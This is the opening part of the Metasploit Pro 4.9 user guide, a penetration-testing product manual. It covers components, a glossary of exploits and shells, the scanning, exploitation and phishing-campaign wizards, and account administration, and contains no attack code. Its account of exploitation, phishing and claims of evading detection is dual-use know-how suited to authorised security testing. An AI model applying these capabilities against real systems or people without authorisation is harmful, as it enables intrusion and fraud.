Pro User Guide

User Guide
Release 4.9
Last Updated: March 21, 2014
Table of Contents
cover-page Chapter 1: Introduction to Metasploit Pro xix 1 2 2 3 4 4 4 4 5 5 5 5 5 5 6 6 6 6 6 7 8 9 9
About Metasploit Pro Supported Operating Systems Metasploit Pro Components Metasploit Implementation Bind Shell Payload Database Discovery Scan Exploit Listener Meterpreter Modules Payload Project Reverse Shell Payload Shell Shellcode Task Vulnerability Metasploit Pro Workflow Chapter 2: Wizards
Quick PenTest Wizard Target Settings
Target Profiles Configure Scan Settings Configure Exploit Settings Configure Report Settings The Phishing Campaign Wizard About the Phishing Campaign Wizard Create a Project Configure the Phishing Campaign Web Application Test Wizard Configure General Settings Configure Authentication Settings Configure Vulnerability Discovery Settings Configure Vulnerability Exploit Settings Configure Report Settings Chapter 3: Metasploit Tour
10 11 12 13 14 17 17 18 19 19 20 20 21 21 23 24 24 25 26 26 27 29 30 30 31 32 33
Access the Metasploit Web UI Supported Browsers Browser Requirements User Interface Overview Navigational Menu and Features Keyboard Shortcuts Chapter 4: Administration
Account Management Account Types Creating a User Account Changing an Account Password Resetting the Password for a User Account
ii
Deleting a User Account Setting the Time Zone Account Requirements System Management Global Settings Setting HTTP Payloads Setting HTTPS Payloads Enabling Automatic Updates Disabling Automatic Updates Automatically Enabling an HTTP Proxy for Updates Defining SMTP Settings for a Mail Server Removing Metasploit License Keys Getting a License Key Activating a License Key for the First Time Updating a License Key Performing an Offline Activation Reverting to the Previous License Key Services Restarting Metasploit Services on Windows Restarting Metasploit Services on Linux Logs Log File Locations System Updates Notification Center Accessing NotificationCenter Notification Events
34 35 36 37 37 37 38 39 39 40 40 42 44 44 45 46 47 48 50 50 50 52 52 54 55 55 55
iii
Sorting Notifications by Event Type Clearing a Notification Updating the System Updating Metasploit Offline Chapter 4: Host Management
55 56 57 58 62 63 63 64 65 65 66 68 68 70 71 71 73 74 75 75 77 78 80 81 83 83 84
Host Management Interfaces Tour of the Analysis Area Tour of the Single Host Page Viewing and Editing Host Metadata Viewing Host Metadata Editing Host Information Adding and Deleting Hosts Adding a Host to a Project Deleting a Host from a Project Adding, Editing, and Deleting Services Adding a Service to a Host Editing a Service Deleting a Service from a Host Adding, Editing, and Deleting Vulnerabilities Adding a Vulnerability to a Host Adding a Vulnerability Reference Deleting a Vulnerability Reference Deleting a Vulnerability from a Host Deleting a Vulnerability from All Hosts Adding, Editing, and Deleting Credentials Viewing Credentials for a Project Viewing Credentials for a Host
iv
Adding a Known Credential Pair Editing a Credential Pair Deleting a Credential Pair from a Host Adding, Editing, Download, and Deleting Captured Data Adding Captured Data to a Host Downloading a Captured Data File Viewing a Captured Data File Viewing All Captured Data in a Project Deleting Captured Data from a Project Chapter 5: Projects
85 87 89 91 91 93 94 95 95 96 97 97 98 98 99 100 101 102 103 104 106 109 109 112 116 117 117
About Projects Project Components Project Management Creating a Project Viewing All Projects Importing Data from Other Projects Deleting a Project Changing the Project Owner Managing User Access Setting the Network Range Restricting a Project to a Network Range Team Collaboration User Access Management Host Comments Chapter 6: Modules
About Modules Modules Directory
Modules Types Modules Excluded from Metasploit Pro Common Module Options Running a Module Module Search Keyword Tags Module Statistics Viewing Module Statistics Module Rankings Chapter 7: Scanning
117 118 119 119 121 121 123 123 124 125 126 127 127 127 128 129 130 132 133 135 135 136 138 139 140 141 141
About Scanning Discovery Scans Data Gathered during a Discovery Scan How a Discovery Scan Works Ports Included in the Discovery Scan Supported Scan Data Types Discovery Scan Options IPv6 Addresses Virtual Host Discovery Discovery Scan Tasks Running a Discovery Scan Scanning for H.323 Conferencing Systems Defining Nmap Arguments Viewing the Results from a Scan Host Management Advanced Search Parts of a Advanced Search Query
vi
Advanced Keyword Search Examples Nested Searches Adding a Host Manually Viewing Services for a Host Viewing Host Notes Deleting a Host Viewing Captured Data Viewing Vulnerabilities Viewing Tags Importing Scan Data Viewing Exploits for Known Vulnerabilities Chapter 7: Validating Nexpose Vulnerabilities
145 146 147 149 149 149 150 150 150 150 151 152 153 153 153 154 155 157 157 168 180 180 181 186 187 187 188
Getting Started with Vulnerability Validation Methods for Validating Vulnerabilities About the Vulnerability ValidationWizard Vulnerability Validation Terminology Before YouBegin Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard Importing and Exploiting Imported Nexpose Data Scanning Nexpose Sites and Exploiting Identified Vulnerabilities Tracking Real-Time Statistics and Events for Vulnerability Validation Accessing the Findings Window The Statistics Tab The Tasks Log Tab Nexpose Exceptions The Exceptions Page Creating and Pushing Nexpose Exceptions
vii
Viewing Vulnerability Exceptions in Nexpose Validated Vulnerabilities Pushing Validated Vulnerabilities Back to Nexpose Viewing Validated Vulnerabilities in Nexpose Searching for Validated Vulnerabilities in Nexpose Chapter 8: Nexpose
192 193 193 194 196 197 198 198 199 200 200 200 204 204 205 205 205 206 207 208 208 210 210 210 212 212 213
About Nexpose Nexpose Terminology Nexpose Integration with Metasploit Nexpose Scan Before You Run a Nexpose Scan Configuring a Nexpose Console Import Nexpose Data Importing Vulnerability Data from Nexpose Excluding Hosts from a Nexpose Data Import Running a Nexpose Scan Running a Nexpose Scan with a Custom Template Purging Scan Data Passing the Hash from Metasploit Searching for Tagged Nexpose Assets Importing Nexpose Data Vulnerability Exceptions Reasons for Vulnerability Exceptions Creating a Vulnerability Exception Nexpose Asset Groups Creating a Nexpose Asset Group Automatically Tagging Assets from a Nexpose Scan
viii
Automatically Tagging Assets from a Nexpose Import Vulnerability Tracking Viewing the Vulnerability Overview Page Vulnerability Details Page Host Details Page Chapter 9: Password Cracking
213 214 214 214 215 217 218 218 226 226 227 227 228 229 229 232 232 232 233 233 233 234 235 235 235 237 238
About Password Cracking Bruteforce Attacks Running a Bruteforce Attack Running a Bruteforce Attack against a VM Running a Bruteforce Attack with a Password List Running a Bruteforce Attack with a Single Credential Importing a Password List Credential Management Supported Credential Formats Word Lists Importing a Custom Word List Selecting a Custom Word List Viewing Imported Credentials Viewing Metasploit Word Lists Deleting Imported Word Lists Chapter 10: Exploitation
About Exploitation Automated Exploits Manual Exploits Components of an Exploit Common Exploitation Tasks
ix
Searching for Exploits Running Automated Exploits Running a Single Exploit Setting Up a Listener Enabling and Disabling a Listener Stopping a Listener Chapter 11: Payloads
238 238 239 239 240 240 241 242 243 243 246 252
The Payload Generator Accessing the Payload Generator Building Dynamic Payloads Building Classic Payloads Listeners Chapter 12: MetaModules
253 254 255 255 256 256 259 261 261 261 267 267 271 271 276
About MetaModules Tour of the MetaModules Overview Page MetaModule Runs MetaModule Findings MetaModule Findings Deleting a MetaModule Run Single Password Testing MetaModule Lockout Risks Running the Single Password Testing MetaModule SSH Key Testing MetaModule Running the SSH KeyTesting MetaModule Pass the HashMetaModule Running the Pass the Hash MetaModule Known Credentials Intrusion MetaModule
Running the Known Credentials Intrusion MetaModule Segmentation and Firewall Testing MetaModule Egress Scan Target Port States Running the Segmentation and Firewall Testing MetaModule Passive Network Discovery MetaModule Running the Passive Network Discovery MetaModule MetaModule Reports Firewall Egress Testing Report Passive Network Discovery Findings Report Auth MetaModule Reports Chapter 13: Web Scans Web Application Testing Authenticated Web Scans Creating a URL Blacklist for Web Scans Enabling Secure Socket Layer Checks for Web Scans Web Audit Web Application Exploit Web Application Assessment Report Web Application Assessment Report Sections Web Application Assessment Report Engagement Scope Web Application Assessment Report Summary Graphs OWASP Top 10 Web Application Security Risk Summary Web Application Assessment Report Vulnerability Details Web Application Assessment Report Remediation Web Application Assessment Report Glossary WebApplicationTests
276 280 280 280 281 284 284 290 291 293 294 295 296 297 298 298 299 301 303 305 305 305 306 308 308 309 310
xi
Web Application Assessment Report Options Web Application Assessment Report Options Generating a Web Application Assessment Report Viewing Web Vulnerability Details Web Vulnerability Categories Vulnerability Proof Text Chapter 15: Host Tags
311 312 313 316 316 317 319 320 320 322 322 323 324 325 326 326 327 328 329 330 330 331 331 332 332 332 332
About Host Tags Components of a Host Tag Host Tag Tasks Creating a Host Tag Deleting a Host Tag Applying a Host Tag Updating a Host Tag Automatically Tagging Discovered Hosts Automatically Tagging Imported Hosts Searching for Hosts by Host Tag Chapter 16: Sessions
About Sessions Active Sessions Command Shell Session Meterpreter Sessions Authentication Notes Session Tasks Session Details Proxy Pivot VPN Pivot
xii
Virtual Interfaces VNC Sessions File Systems Chapter 17: Social Engineering
333 333 334 335 336 336 336 337 338 338 339 339 339 340 341 342 343 343 343 343 343 343 343 344 344 344 344
About Social Engineering Social Engineering for Metasploit 4.4 and Older Viewing Legacy Campaigns Generating a Report for Legacy Campaigns Social Engineering Techniques Phishing Client-Side Exploits File Format Exploits Java Signed Applets Portable Files Social Engineering Components Social Engineering Workflow Social Engineering Terminology Browser Autopwn Campaign Click Tracking E-mail Template Executable File Format Exploit Human Target Phishing Attack Portable File Resource File
xiii
Social Engineering Target List Tracking GIF Tracking Link Tracking String Visit Web Template Campaign Dashboard Campaign Tasks Bar Campaign Widgets Modal Windows Action Links Campaigns Campaign Restrictions Campaign States Campaign Management Creating a Campaign Editing the Campaign Name Running a Campaign Clearing the Data from a Campaign Viewing the Findings for a Campaign Adding a Campaign Component Removing a Campaign Component Stopping a Campaign Sending an E-mail Notification when a Campaign Starts Deleting a Campaign Exporting a CSV File of Campaign Findings
344 344 344 345 345 345 345 346 346 347 347 347 349 349 349 351 351 351 352 352 353 353 354 354 355 355 356
xiv
Exporting a CSV File of E-mail Sent from a Campaign Exporting a CSV File of Human Targets that Opened the E-mail Exporting a CSV File of Human Targets that Clicked on the Link Exporting a CSV File of Human Targets that Submitted the Form Campaign Components E-mail Web Page Portable File Reusable Campaign Resources Target Lists Templates E-mail Templates Malicious Files USB Key Campaigns Executable Files File Format Exploits Phishing Campaigns How a Phishing Campaign Works Before You Create a Phishing Campaign Creating a Phishing Attack Working with Sessions Checking for Open Sessions Cleaning Up Sessions Social Engineering Report Social Engineering Report Sections Generating a SocialEngineering Details Campaigns Report Chapter 18: Task Chains
356 356 357 357 358 358 362 369 372 372 375 377 379 383 383 385 387 387 387 388 392 392 392 393 393 404 407
xv
About Task Chains Task ChainUI Tour Supported Tasks Working with Task Chains Creating a Task Chain Adding a Task to a Task Chain Cloning a Task Rearranging Tasks in a Task Chain Adding a Post-Exploitation Module to a Task Chain Removing a Task from a Task Chain Clearing the Project Data before a Task Chain Runs Resetting a Task Chain Running a Task Chain Managing and Editing Task Chains Editing a Task Chain Cloning a Task Chain Suspending a Task Chain Updating the Schedule for a Task Chain Stopping a Running Task Chain Stopping All Running Tasks Viewing the Tasks Log Cleaning Up Open Sessions Deleting a Task Chain Task Chain Schedules Schedule Options Scheduling a TaskChain Suspending a Schedule
408 408 411 412 412 414 415 415 416 416 417 418 418 420 420 421 421 423 423 424 424 425 425 427 427 428 429
xvi
Setting the Maximum Duration for a Task Chain Chapter 19: Reports
430 432 433 433 434 434 435 438 438 443 443 444 447 449 450 451 451 452 454 454 454 455 456 456 457 457 461
About Reports Report Output Formats Reports Directory Report Logs Using the Reporting Interface Metasploit Report Types Understanding Report Types Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports Notification Center Statuses for Reports Generating a Standard Report Generating a CustomReport Downloading a Report Viewing a Report E-mailing a Report Cloning a Report Configuration Deleting Reports Customizing Standard Reports Excluding Report Sections Excluding and Including Hosts from Reports Masking Credentials from Reports Removing Charts from Reports Including Web Page HTML in Social Engineering Reports Customizing Report Names Adding a Custom Logo to a Report Working with Custom Templates
xvii
Jasper Reports and iReport Designer Requirements for Designing Custom Templates Setting Up the Metasploit Database in iReport Designer Custom Resources Directory Uploading Templates Downloading a Custom Report Template Deleting a Custom Report Template Downloading the Example Template Exporting Data Exports Directory Export Logs Notification Center Statuses for Exports Export Types Viewing Exported Data FrequentlyAsked Questions Glossary
461 462 462 466 466 469 470 471 473 473 473 474 474 481 i x
xviii
Introduction to Metasploit Pro

Chapter 1:
Metasploit Pro is an all-inclusive exploitation and verification tool that helps you divide the penetration testing into smaller and more manageable tasks. With Metasploit Pro, you can scan target systems, identify system flaws and vulnerabilities, exploit those weaknesses, and create a report of your findings. These are a just few of the tasks that you can perform with MetasploitPro. To learn more about MetasploitPro, read the following topics:
l
Metasploit Pro Components on page 3About Metasploit Pro on page 2 Metasploit Pro Components on page 3 Metasploit Implementation on page 4 Metasploit Pro Workflow on page 7
About Metasploit Pro

With Metasploit Pro, you can leverage the power of the Metasploit Framework and its exploit database through a web based user interface to perform security assessments and vulnerability validation. Metasploit Pro automates the process of discovery and exploitation and provides you with the necessary tools to perform the manual testing phase of a penetration test. You can use Metasploit Pro to perform tasks like scan for open ports and services, exploit vulnerabilities, pivot further into a network, collect evidence, and create a report of the test results. Metasploit Pro is a multi-user, collaborative tool that lets you share tasks and information with the members of a penetration testing team. With team collaboration capabilities, you can divide a penetration test into multiple parts, assign members a specific network segment to test, and let members leverage any specialized knowledge that they may have. Team members can share host data, view collected evidence, and create host notes to share knowledge about a particular target. Ultimately, Metasploit Pro helps you identify the weakest point to exploit a target and prove that a vulnerability or security issue exists.
Supported Operating Systems

Metasploit Pro supports the following operating systems.
Linux
l
Red Hat Enterprise Linux 5.x, 6.x - x86, and x86_64 Ubuntu Linux 8.04, 10.04, 12.04 - x86, and x86_64 BackTrack Kali
Windows
l
Windows XP, 2003, Vista, 2008 Server, 7, and 8
About Metasploit Pro
Metasploit Pro Components

Metasploit Pro consists of multiple components that work together to provide you with a complete penetration testing tool. The following components make up Metasploit Pro.
Metasploit Framework
An open source penetration testing and development platform that provides you with access to every module that Metasploit Pro needs to perform tasks. The Metasploit Framework contains an exploit database that provides you with the latest exploit code for various applications, operating systems, and platforms. You can leverage the power of the Metasploit Framework to create additional custom security tools or write your own exploit code for new vulnerabilities. The Metasploit team regularly releases weekly updates that contain new modules and bi-weekly updates that contain fixes and enhancements for known issues with Metasploit Pro.
Modules
A module is a standalone piece of code, or software, that extends functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enables you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.
Services
Metasploit Pro uses PostgreSQL, Ruby on Rails, and Pro Service. PostgreSQL runs the database that Metasploit Pro uses to store data from a project. Ruby on Rails runs the web Metasploit Pro web interface. Pro service, or the Metasploit service bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.
User Interface
The component that you use to interact with Metasploit Pro. To launch the user interface, open a web browser and go to https://localhost:3790.
Metasploit Pro Components
Metasploit Implementation
Rapid7 distributes Metasploit Pro as an executable file for Linux and Windows operating systems. Download and run the executable to install Metasploit Pro on your local machine or on a remote host, like a web server. Regardless of where you install Metasploit Pro, you always access the user interface through a web browser. Metasploit Pro uses a secure connection to connect to the server or machine that runs it. If you install Metasploit Pro on a web server, users can use a web browser to access the user interface from any location. Users will need the address and port for the server that Metasploit Pro uses. By default, the Metasploit service uses port 3790. You can change the port that Metasploit uses during the installation process. So, for example, if Metasploit Pro runs on 192.168.184.142 and port 3790, users can use https://192.168.184.142:3790 to launch the user interface. If Metasploit Pro runs on your local machine, you can use localhost and port 3790 to access Metasploit Pro. For example, type https://localhost:3790 in the browser URL box to load the user interface. If you have not installed Metasploit Pro, you can download the installer from the Rapid7 website. You will need a license key to activate the product. If you do not have a license key, please contact the Rapid7 sales team at sales@rapid7.com.
Bind Shell Payload

A bind shell attaches a listener on the exploited system and waits for the attacking machine to connect to the listener.
Database
The database stores target host data, system logs, collected evidence, and report data.
Discovery Scan
A discovery scan is the Metasploit internal scanner that combines Nmap and several Metasploit modules to scan and fingerprint targets. If you do not have Nexpose or scan data to import into Metasploit Pro, you can run a discovery scan to gather information about the target. There are several scan speeds that you can configure for a discovery scan. The scan speed determines the method that the discovery scan uses to perform the discovery process.
Metasploit Implementation
Exploit
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers the payload to the target system. For example, one of the most common exploits is windows/smb/s08-067_netapi, which targets a Windows Server Service vulnerability that could allow remote code execution. You can run this exploit against a machine that has the ms0-067 vulnerability to remotely take control of the system.
Listener
A listener waits for an incoming connection from either the exploited target or the attacking machine and manages the connection when it receives it.
Meterpreter
Meterpreter is an advanced multi-function payload that provides you an interactive shell. From the Meterpreter shell, you can do things like download a file, obtain the password hashes for user accounts, and pivot into other networks. Meterpreter runs on memory, so it is undetectable by most intrusion detection systems.
Modules
A module is a standalone piece of code, or software, that extends functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enables you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.
Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. A payload can be a reverse shell payload or a bind shell payload. The major difference between these payloads is the direction of the connection after the exploit occurs.
Project
A project is a container for the targets, tasks, reports, and data that are part of a penetration test. A project represents the workspace that you use to create a penetration test and configure tasks. Every penetration
Exploit
test runs from within a project.
Reverse Shell Payload

A reverse shell connects back to the attacking machine as a command prompt.
Shell
A shell is a console-like interface that provides you with access to a remote target.
Shellcode
Shellcode is the set of instructions that an exploit uses as the payload.
Task
A task represents an action that Metasploit Pro can perform, such as a scan hosts, bruteforce credentials, exploit vulnerable targets, or generate a report.
Vulnerability
A vulnerability is a security flaw or weakness in an application or system that enables an attacker to compromise the target system. A compromised system can result in privilege escalation, denial-ofservice, unauthorized data access, stolen passwords, and buffer overflows.
Metasploit Pro Workflow

The overall process of penetration testing can be broken down into a series of steps or phases. Depending on the methodology that you follow, there can be anywhere between four and seven phases in a penetration test. The names of the phases can vary, but they generally include reconnaissance, scanning, exploitation, post-exploitation, maintaining access, reporting, and cleaning up. The Metasploit Pro workflow follows the general steps of a penetration test. Besides reconnaissance, you can perform the other penetration testing steps from Metasploit Pro. 1. Information Gathering- Use the Discovery scan, Nexpose scan, or import tool to supply Metasploit Pro with a list of targets and the running services and open ports associated with those targets. 2. Exploitation - Use smart exploits or manual exploits to launch attacks against target machines. Additionally, you can run bruteforce attacks to escalate account privileges and to gain access to exploited machines. 3. Post-Exploitation - Use post-exploitation modules or interactive sessions to interact gather more information from compromised targets. Metasploit Pro provides you with several tools that you can use to interact with open sessions on an exploited machine. For example, you can view shared file systems on the compromised target to identify information about internal applications. You can leverage this information to obtain even more information about the 4. Cleaning Up - Use the Clean Up option to close any open sessions on an exploited target and to remove any evidence of any data used during the penetration test. This step restores the original settings on the target system. 5. Reporting - Use the reporting engine to create a report that details the findings of the penetration test. Metasploit Pro provides several types that let you to determine the type of information that the report includes.
Metasploit Pro Workflow
Chapter 2:
Wizards
Metasploit Pro includes several wizards that provide a guided interface that walk you through a few of the most common tasks in penetration testing, such as a standard penetration test, phishing campaign, and web application test. To get started with one of the wizards, read the following topics:
l
Quick PenTest Wizard on page 9 About the Phishing Campaign Wizard on page 17 Web Application Test Wizard on page 19
Quick PenTest Wizard

The Quick PenTestwizard is a guided interface that helps you configure the most common tasks associated with a penetration test, such as scanning, exploiting and reporting. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or you can use the default settings. Each time you switch between task tabs, the wizard validates the settings for the task. If there are any issues with the configuration, a red asterisks appears on the tab to alert you that there are settings that need to be reconfigured. The goal of the Quick PenTest Wizard is to provide an easy way to create and launch a penetration test with very little configuration. With the Quick PenTest Wizard, you can launch the test immediately after you provide a project name and the target addresses. After you launch the test, Metasploit Pro automatically saves the projects and runs the tasks that you have configured. All findings are viewable from within the project and from the report.
Target Settings
Quick PenTest Wizard
Target Profiles
When you launch the Quick PenTest Wizard, it displays a list of target profiles that you can select for the test. A target profile uses the host information obtained by the scan to build an attack plan based the system and device type. There are target profiles for Windows targets, *nix servers, web servers, and network devices. If you want to exploit all systems and devices, you can use the Everything target profile. For example, if you choose the Web Servers target profile, Metasploit Pro will only exploit systems that are running an HTTP or HTTPS service and will skip systems that do not match the target profile. Note: If the test does not have any systems that match the selected target profile, it will skip the exploitation phase.
The following target profiles are available:

l
Windows Targets - Any server or client that runs any version of Windows. *nix Servers - Any server or client that runs a Linux operating system, or any server or client that runs a UNIX-like operating system or a common UNIX service, such as SSH or inetd. Web Servers - Any server that runs an HTTP or HTTPS service.
Target Profiles
10
Network Devices - Any system that is not a server or a client. These systems typically do not run a standard operating system, like Windows or Linux. Some examples of network devices are printers, faxes, and routers.
Configure Scan Settings
Configure Scan Settings
11
Configure Exploit Settings
Configure Exploit Settings
12
Configure Report Settings
13
The Phishing Campaign Wizard

The Phishing Campaign Wizard is a guided interface that provides instructions to set up a phishing attack. When you launch the Phishing Campaign Wizard, it prompts you to create a project to store the campaign. After you create the project, the Phishing Campaign Wizard opens the campaign configuration page, which is preconfigured with the components that you need to set up a phishing attack. When you first access the phishing campaign, the campaign will contain a web page component called Landing Page, an e-mail component, an e-mail server, and a web server. A second web page component will be added after you configure the Landing page, if you opt to create a redirect web page rather than use a real web page. Each component is represented by a widget that launches the components configuration form. When you click on a widget, a modal window appears and shows you the fields and options that you can configure for the component. Each modal window provides step-by-step guidance to show you how to configure the campaign component and validates the component before saving it.
To launch the Phishing Campaign Wizard:

1. From the Projects Overview page, click the Phishing Campaign Wizard widget.
2. When the Phishing Campaignwindow appears, enter a name for the project. The project name can use any combination of alphanumeric characters, special characters, and spaces.
14
3. In the Address Range field, enter an address range for the project. This step is optional. Note: The address range sets the default addresses that automatically populate the Target Addresses field for Discovery Scans and Nexpose Scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
4. Click the Next button to launch the campaign configuration page. Now, you are ready to configure the campaign components. The first thing you should do is provide a name for the campaign. Metasploit Pro will automatically save the campaign each time you click on a widget to open a campaign component.
15
After you name the campaign, you will need to configure the e-mail and web page components. Then, you will need to define the settings for your SMTP server and web server. To configure the campaign components, click on any of the widgets on the campaign configuration form. The corresponding configuration window will open for the component that you chose.
16
About the Phishing Campaign Wizard

The Phishing Campaign Wizard is a guided interface that helps you quickly create a project and campaign for phishing attacks. When you launch the Phishing Campaign Wizard, it prompts you to create a project to store the campaign. After you create the project, the wizard launches the campaign configuration page, which contains preset components that you configure to create a phishing attack. It contains the e-mail, web page, web server, and e-mail components, which all must be configured before you can run the campaign.
Create a Project
About the Phishing Campaign Wizard
17
Configure the Phishing Campaign
Configure the Phishing Campaign
18
Web Application Test Wizard

Web application testing is a three part process that involves the following tasks:
l
Crawling URLs - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing. Auditing Vulnerabilities- The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases. Exploiting Vulnerabilities- Metasploit Pro automatically generates an exploit map, or an attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application.
To guide you through this process. the Web Application Test Wizard provides a guided interface that helps you seamlessly set up a web application test that automatically runs each task. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or you can use the default settings. When you switch between task tabs, the wizard validates the configuration for the task. If the wizard identifies any misconfigurations, a red asterisks appears on the tab to alert you that there are settings that need to be reconfigured.
Configure General Settings
Web Application Test Wizard
19
Configure Authentication Settings
Configure Vulnerability Discovery Settings
Configure Authentication Settings
20
Configure Vulnerability Exploit Settings
Configure Vulnerability Exploit Settings
21
22
Chapter 3:
Metasploit Tour
The Metasploit Web UI is a browser-based interface that provides you with access to Metasploit Pro features. You can access the Metasploit Pro WebUI with any supported browser. This includes Internet Explorer 9+, Mozilla Firefox 4.0+, and GoogleChrome 10+. To learn more about the Metasploit WebUI, read the following topics:
l
Access the Metasploit Web UI on page 24 User Interface Overview on page 26
Access the Metasploit Web UI

To access the Metasploit Web UI, open a browser and go to https://localhost:3790 if Metasploit Pro runs on your local machine. If Metasploit Pro runs on a remote machine, replace localhost with the address of the remote machine.
Supported Browsers
The user interface runs on the following browsers:
l
Google Chrome 10+ Mozilla Firefox 18+ Internet Explorer 9+ Iceweasel 18+
Note: The web user interface may run on other browsers, but Metasploit Pro does not officially support those browsers.
Access the Metasploit Web UI
24
Browser Requirements
You must enable Javascript so that the user interface displays and functions correctly. If you disable Javascript, some features may not be visible or available to you. For instructions on how to enable Javascript, please visit http://www.enable-javascript.com.
Browser Requirements
25
User Interface Overview

The user interface provides the workspace that you use to set up projects and configure tasks for a penetration test. It is a browser based interface that consists of multiple navigational tabs that you can use to access the various task configuration pages. From the user interface, you can do things like run a discovery scan, send an exploit to a target, create a report, configure system settings, and perform administrative tasks. When you first open a project, the Dashboard, or Overview page, displays the statistical information for the project, such as the types of hosts, operating systems, and services.
Additionally, from the Dashboard, you can view the Recent Events log to see the latest activity for the project. This is useful if you are part of a team and want to see what other members have done within the project. Ultimately, the Dashboard helps you quickly assess the data that has been collected for the project at a certain point in time. From the Dashboard, you can launch the configuration page for most tasks, such as discovery scans, Nexpose scans, data imports, web scans, bruteforce attacks, smart exploits and social engineering campaigns. The two tasks you cannot launch directly from the Dashboard are manual exploits and reports. Each task has its own configuration page that displays all the options and settings that you can define for a task. The user interface displays the fields you need to input data, check box options that you can enable or disable depending on your test requirements, and dropdown menus that provide you with available options for a particular task.
Navigational Menu and Features

Use the following menu and features to navigate between the different areas of Metasploit Pro:
User Interface Overview
26
Main menu - Use the Main menu to access project settings, edit account information, perform administrative tasks, and view software update alerts. Project menu -Use the Project menu to create, edit, open, and view projects. Account menu - Use the Account menu to manage your account settings. You can change your password, set the time zone, and edit the contact information for the account. Administration menu - Use the Administration menu to manage system updates, license keys, user accounts, and global settings. Task bar - Use the task bar to navigate between task pages. Navigational breadcrumbs - Use the navigational breadcrumbs to switch between related task pages. Quick tasks - Use the quick tasks to access the task configuration page.
The following image shows the navigational features:
Keyboard Shortcuts
A keyboard shortcut is a method that uses a combination of keys to invoke a function inMetasploit. They make it easier and faster to interact with the web interface, which saves you time as you build and run your penetration tests. The following keyboard shortcuts are available:
Keyboard Shortcuts
27
Keys j/k ctrl+~ ctrl+SHIFT+~ F1 F3 Scrolls the page up or down.
Description
Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings. Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings. Opens the online help system. Closes or opens the selected help icon.
Keyboard Shortcuts
28
Chapter 4:
Administration
To learn more about system administration, read the following topics:

l
Account Management on page 30 System Management on page 37 License Keys on page 44 Services on page 50 Logs on page 52 System Updates on page 54
Account Management
A user account provides you and your team members with access to Metasploit Pro. You use a user account to log into Metasploit Pro and to create identifies for other members on the team. A user account consists of a login name, the users full name, a password, and a role. Use the following components to set up a user account:
l
Login name - The user name that the system uses to uniquely identify a person. Full name - The first and last name for the person who owns the user account. Password - An eight character string that allows access to the use account. Role - The level of access that the user has to Metasploit Pro and other projects. The role can be an administrator or basic user.
Account Types
A user account can be a non-administrator account or an administrator account. The account type determines the level of privileges that a user must have to perform certain tasks. For example, administrators have unrestricted access to the system so they can perform system updates, manage user accounts, and configure system settings. Non-administrator accounts, on the other hand, have access to Metasploit Pro, but can only perform a limited set of tasks.
Administrator Account
An administrator account has unrestricted access to all Metasploit Pro features. With an administrator account, you can do things like remove and add user accounts, update Metasploit Pro, and access all projects.
Non-Administrator Account
A non-administrator account gives a user access to Metasploit Pro, but does not provide them with unlimited control over projects and system settings.This account restricts the user to the projects that they have access to and the projects that they own. A non-administrator account cannot perform the following tasks:
l
Create or manage other user accounts. Configure global settings for Metasploit Pro. Update Metasploit Pro.
Account Management
30
Update the license key. View projects that they do have access to.
Creating a User Account

1. Click Administrator > User Administration from the main menu.
2. When the User Administration page appears, click the New User button. 3. When the New User page appears, fill out the following information to create a user account:
User name - Enter a user ID for the account. Full name - Enter the users first and last name. Password - Use mixed case, punctuation, numbers, and at least eight characters to create a strong password. Password confirmation - Re-enter the password.
4. Select the Administrator option if you want to provide the account with administrative rights. If the account has administrative privileges, the user has unrestricted access to all areas of Metasploit Pro. If the account does not have administrative rights, the user can only work with projects that they have access to and cannot update the system. 5. If the account does not have administrative rights, click the Show Advanced Options button to choose the projects that the user can access.
Creating a User Account
31
6. Save the changes to the user account.
Changing an Account Password

1. Choose Administration > User Administration from the main menu.
2. Select the user account that you want to modify.
3. Click the Settings button. 4. Find the Change Password area. 5. In the New Password field, enter a password for the account. The password must contain at least eight characters and consist of letters, numbers, and at least one special character.
6. Reenter the password in the Password Confirmation field. 7. Click the Change Password button.
Changing an Account Password
32
Resetting the Password for a User Account

If you have forgotten your password or need reset your password, follow the instructions for your operating system.
Windows
1. From the Start menu, choose All Programs > Metasploit > Password Reset. 2. When the Password Reset window appears, wait for the environment to load.
3. When the dialog prompts you to continue, enter yes. The system resets the password to a random value. 4. Copy the password and use the password the next time you log in to Metasploit Pro. You can change the password after you log in to Metasploit Pro. 5. Exit the Password Reset window.
Linux
1. Open the command line terminal and execute the following command: sudo </path/to/metasploit>/diagnostic_shell.
Resetting the Password for a User Account
33
2. If prompted, enter your sudo password. 3. When the system returns the bash# prompt, enter </path/to/metasploit>/apps/pro/ui/script/resetpw to run the resetpw script.
4. Copy the password and use the password the next time you log into Metasploit Pro. You can change the password after you log in to Metasploit Pro. 5. Exit the console.
Deleting a User Account

If you have an administrator account, you can delete user accounts that you no longer need. When you delete a user account, the system reassigns the projects that belong to the account to the system. Any project that does not have a project owner will have system listed as the project owner. 1. Choose Administration > User Administration from the main menu.
Deleting a User Account
34
2. Select the user account that you want to delete.
3. Click Delete.
4. Click OK to confirm that you want to delete the account.
Setting the Time Zone

You can set the time zone that Metasploit Pro uses. The time zone is specific to each user account. 1. Choose Account > User Settings from the main menu. 2. Under Preferences, click the Time zone dropdown. A list of available time zones displays.
Setting the Time Zone
35
3. Choose the time zone that you want to use. 4. Save the changes.
Account Requirements
